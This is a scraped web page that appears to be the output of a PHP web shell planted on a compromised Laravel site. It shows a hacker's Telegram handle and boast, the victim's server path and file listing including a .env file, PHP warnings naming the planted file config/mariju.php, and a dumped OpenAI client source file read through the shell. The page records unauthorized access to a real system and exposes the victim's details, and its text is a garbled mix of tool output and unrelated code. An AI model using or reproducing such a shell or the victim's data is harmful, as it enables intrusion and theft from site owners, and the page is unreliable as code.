telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log16492211 KBJuly 18 2025 17:56:410644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
*/ private array $headers = []; /** * The query parameters for the requests. * * @var array */ private array $queryParams = []; private ?Closure $streamHandler = null; /** * Sets the API key for the requests. */ public function withApiKey(string $apiKey): self { $this->apiKey = trim($apiKey); return $this; } /** * Sets the organization for the requests. */ public function withOrganization(?string $organization): self { $this->organization = $organization; return $this; } /** * Sets the project for the requests. */ public function withProject(?string $project): self { $this->project = $project; return $this; } /** * Sets the HTTP client for the requests. * If no client is provided the factory will try to find one using PSR-18 HTTP Client Discovery. */ public function withHttpClient(ClientInterface $client): self { $this->httpClient = $client; return $this; } /** * Sets the stream handler for the requests. Not required when using Guzzle. */ public function withStreamHandler(Closure $streamHandler): self { $this->streamHandler = $streamHandler; return $this; } /** * Sets the base URI for the requests. * If no URI is provided the factory will use the default OpenAI API URI. */ public function withBaseUri(string $baseUri): self { $this->baseUri = $baseUri; return $this; } /** * Adds a custom HTTP header to the requests. */ public function withHttpHeader(string $name, string $value): self { $this->headers[$name] = $value; return $this; } /** * Adds a custom query parameter to the request url. */ public function withQueryParam(string $name, string $value): self { $this->queryParams[$name] = $value; return $this; } /** * Creates a new Open AI Client. */ public function make(): Client { $headers = Headers::create(); if ($this->apiKey !== null) { $headers = Headers::withAuthorization(ApiKey::from($this->apiKey)); } if ($this->organization !== null) { $headers = $headers->withOrganization($this->organization); } if ($this->project !== null) { $headers = $headers->withProject($this->project); } foreach ($this->headers as $name => $value) { $headers = $headers->withCustomHeader($name, $value); } $baseUri = BaseUri::from($this->baseUri ?: 'api.openai.com/v1'); $queryParams = QueryParams::create(); foreach ($this->queryParams as $name => $value) { $queryParams = $queryParams->withParam($name, $value); } $client = $this->httpClient ??= Psr18ClientDiscovery::find(); $sendAsync = $this->makeStreamHandler($client); $transporter = new HttpTransporter($client, $baseUri, $headers, $queryParams, $sendAsync); return new Client($transporter); } /** * Creates a new stream handler for "stream" requests. */ private function makeStreamHandler(ClientInterface $client): Closure { if (! is_null($this->streamHandler)) { return $this->streamHandler; } if ($client instanceof GuzzleClient) { return fn (RequestInterface $request): ResponseInterface => $client->send($request, ['stream' => true]); } if ($client instanceof Psr18Client) { // @phpstan-ignore-line return fn (RequestInterface $request): ResponseInterface => $client->sendRequest($request); // @phpstan-ignore-line } return function (RequestInterface $_): never { throw new Exception('To use stream requests you must provide an stream handler closure via the OpenAI factory.'); }; } }